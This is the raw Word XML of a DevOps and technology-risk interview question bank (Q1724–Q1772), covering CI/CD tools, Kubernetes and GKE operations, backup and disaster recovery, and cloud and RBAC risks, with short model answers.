        <w:t>A: A REST API is a web service interface that uses standard HTTP methods (GET, POST, PUT, DELETE) on resource-based URLs to let clients create, read, update, and delete data over HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1724. What is YAML used for?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: YAML is a human-readable data serialization format used to write structured configuration - Kubernetes manifests, Ansible playbooks, CI/CD pipeline definitions - because its indentation-based syntax is easier to read and write than JSON or XML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1725. What is a cron job?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A cron job is a task scheduled to run automatically at fixed times or intervals, defined using cron's time-based syntax (minute, hour, day, month, weekday) on Linux systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1726. What is SSH?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: SSH (Secure Shell) is an encrypted network protocol used to securely log into and execute commands on a remote machine, and is the transport Ansible and most server administration relies on.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1727. What is the difference between a process and a thread?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1728. What is a zombie process, and how do you fix a system that has many of them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1729. What is a file descriptor limit (ulimit), and how do you fix a "too many open files" error?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1730. What is CPU throttling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: CPU throttling happens when a process's CPU usage is capped - deliberately, by a container CPU limit, or by hardware thermal limits - and it's forced to run slower or is paused once it exceeds its allotted CPU time in a given period.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1731. What is a message queue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A message queue is a middleware component (like Pub/Sub, RabbitMQ, or Kafka) that decouples producers and consumers by buffering messages between them, enabling asynchronous processing and absorbing load spikes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1732. What is caching?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Caching stores frequently accessed data in a faster-to-read location (memory, CDN, local disk) so subsequent requests can be served without recomputing or re-fetching from the slower original source.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1733. What is a monolith versus a microservice?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1734. What is a typical CI/CD pipeline flow, stage by stage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1735. What is a Jenkins pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Jenkins pipeline is a suite of automated build/test/deploy steps defined as code (in a Jenkinsfile) that Jenkins executes as a single connected workflow, giving you version-controlled, repeatable CI/CD instead of clicking through freestyle job configuration in the UI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1736. What is the difference between a Jenkins declarative pipeline and a scripted pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1737. What is a Jenkins agent (node)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1738. What are Jenkins plugins, and can you name a few commonly used ones?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1739. What is GitLab CI/CD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GitLab CI/CD is GitLab's built-in continuous integration and delivery system, where pipelines are defined in a .gitlab-ci.yml file at the repo root and executed by GitLab Runners whenever code is pushed or merged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1740. What is a .gitlab-ci.yml file?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The .gitlab-ci.yml file is a YAML file at the root of a GitLab repository that defines the pipeline's stages and jobs - what to run, in what order, on what triggers, and with what scripts - which GitLab automatically picks up and executes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1741. What is a GitLab CI/CD runner?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A GitLab Runner is the agent process that actually executes the jobs defined in .gitlab-ci.yml - it can be shared (GitLab-hosted) or self-hosted, and picks up queued jobs from GitLab and reports results back.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1742. What is GitHub Actions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GitHub Actions is GitHub's native CI/CD and automation platform, where workflows defined in YAML files under .github/workflows/ run in response to repository events (push, pull request, schedule, etc.) on GitHub-hosted or self-hosted runners.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1743. What is a GitHub Actions workflow file?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A workflow file is a YAML file under .github/workflows/ that defines triggers (on:), jobs, and steps - each step typically either runs a shell command or invokes a reusable 'Action' from the marketplace or another repo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1744. What is a GitHub Actions runner?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A runner is the server (GitHub-hosted or self-hosted) that executes a workflow's jobs - GitHub-hosted runners are ephemeral VMs provisioned per job, while self-hosted runners are your own persistent machines registered to a repo or org.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1745. What is the difference between Jenkins, GitLab CI, and GitHub Actions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Part 3 — Additional Technology Risk Topics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Architecture Review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1746. Difference between RTO and RPO.</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Cloud Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1747. Shared Responsibility Model.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1748. Risks of public cloud.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1749. IAM best practices.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1750. Risks in Kubernetes clusters.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1751. Risks of Terraform automation.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1752. State file security in Terraform.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1753. Secrets management.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1754. Cloud misconfiguration risks.</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>GKE Backup, Restore and etcd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1755. Scenario: A GKE stateful workload loses data after a bad rollout. How would you restore safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Avoid restoring over the live workload blindly. Freeze writes if needed, identify the last known-good backup or snapshot, restore into an isolated namespace or cluster first, validate data integrity and application startup, then plan cutover or selective data repair. Check whether the workload needs application-consistent backups, not only disk snapshots, and confirm the restored PVCs, StatefulSet identity, service DNS, secrets, and version compatibility before sending traffic back.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1756. What should be included in a Kubernetes disaster recovery runbook for GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Include RTO/RPO targets, owners, escalation, backup locations, restore commands or console steps, GitOps/Terraform recovery order, secret recovery, persistent volume restore, database restore, DNS/load balancer cutover, validation checks, rollback criteria, and communication templates. The runbook should specify what is managed by Google, what is rebuilt from IaC, what is restored from backup, and how to prove the application is healthy after recovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1757. How would you protect Kubernetes backups from ransomware, accidental deletion, or operator error?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use least-privilege access, separate backup admin roles from cluster admins where possible, store backups in a separate project or protected bucket, enable encryption, retention locks or object versioning where suitable, audit access, and alert on backup deletion or policy changes. Test restore with limited credentials and keep backup metadata outside the failure domain of the primary cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1758. What is the difference between backing up Kubernetes manifests, persistent volumes, and application databases?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Manifests capture desired Kubernetes objects such as Deployments, Services, ConfigMaps, RBAC, and policies; persistent volume backups capture disk data attached to Pods; application database backups capture transactionally consistent data from the database engine. A reliable restore often needs all three, but databases usually require application-aware backups or native backup tools to avoid crash-consistency problems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Governance and Compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1759. Difference between ISO 27001 and NIST.</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>IT Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1760. Give examples of each in cloud infrastructure.</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Incident Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1761. Difference between incident, problem, and risk.</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Kubernetes Services, Service Mesh, AKS and GKE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1762. What is the difference between GKE Standard and GKE Autopilot, and how do you choose between them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GKE Autopilot manages nodes and many operational defaults for you, charging mainly by Pod resources and reducing node-management overhead. GKE Standard gives deeper control over node pools, machine types, DaemonSets, networking, upgrades, GPUs, and low-level tuning. Choose Autopilot for simpler, standard workloads where managed operations and secure defaults matter most; choose Standard when you need custom node pools, special hardware, privileged workloads, advanced networking, or tighter cost and scheduling control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1763. Scenario: A GKE workload gets permission denied when accessing Cloud Storage. How would you debug Workload Identity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Verify the Kubernetes ServiceAccount used by the Pod, the mapped Google service account, and the IAM binding that allows the KSA to impersonate the GSA. Then confirm the GSA has the required Cloud Storage role on the right bucket or project. Check Pod annotations, namespace, token projection, metadata server access, and application credentials. Useful commands include kubectl describe pod, kubectl describe serviceaccount, gcloud iam service-accounts get-iam-policy, and gcloud storage buckets get-iam-policy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1764. How would you design a production GKE platform for multiple teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use separate projects or clusters where hard isolation is required, and namespaces where shared-cluster isolation is acceptable. Standardize node pools, labels, taints, quotas, RBAC, NetworkPolicies, Workload Identity, Secret Manager integration, ingress, observability, logging, and GitOps deployment. Add guardrails with policy controllers such as Gatekeeper or Kyverno, provide golden-path templates, define SLOs and runbooks, and make ownership visible through labels, dashboards, and escalation paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1765. How would you compare Kubernetes Ingress, Gateway API, and service mesh ingress?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Ingress is the older common abstraction for HTTP routing into a cluster and is simple for standard host/path routing. Gateway API is a newer, more expressive and role-oriented model that separates infrastructure ownership from route ownership and supports richer traffic management. Service mesh ingress, such as Istio ingress gateway, is useful when north-south traffic should share mesh features like mTLS integration, telemetry, advanced routing, and policy. The choice depends on complexity, ownership model, and whether mesh-level traffic controls are needed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1766. How would you observe and troubleshoot service-to-service latency in a Kubernetes service mesh?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with golden signals: request rate, error rate, latency, and saturation for both client and server. Use mesh telemetry to identify whether latency is from the application, Envoy sidecar, retries, upstream service, DNS, connection pool, or external dependency. Correlate metrics with distributed traces and logs using trace IDs. Check VirtualService retries and timeouts, DestinationRule connection pools, circuit breaking, mTLS handshake issues, resource limits, and whether sidecar overhead is significant under load.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Kubernetes and DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1767. Risks of CI/CD pipelines.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1768. Risks of GitHub Actions.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1769. Risks of Helm charts.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1770. Kubernetes RBAC risks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: RBAC risks include broad ClusterRoleBindings, default service account misuse, wildcard permissions, privilege escalation through pods or secrets, and unclear ownership. I reduce this with namespace-scoped roles, least privilege, access reviews, audit logs, and separating human, workload, and CI/CD permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1771. Risks of privileged containers.</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Monitoring and Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1772. Difference between KRIs and KPIs.</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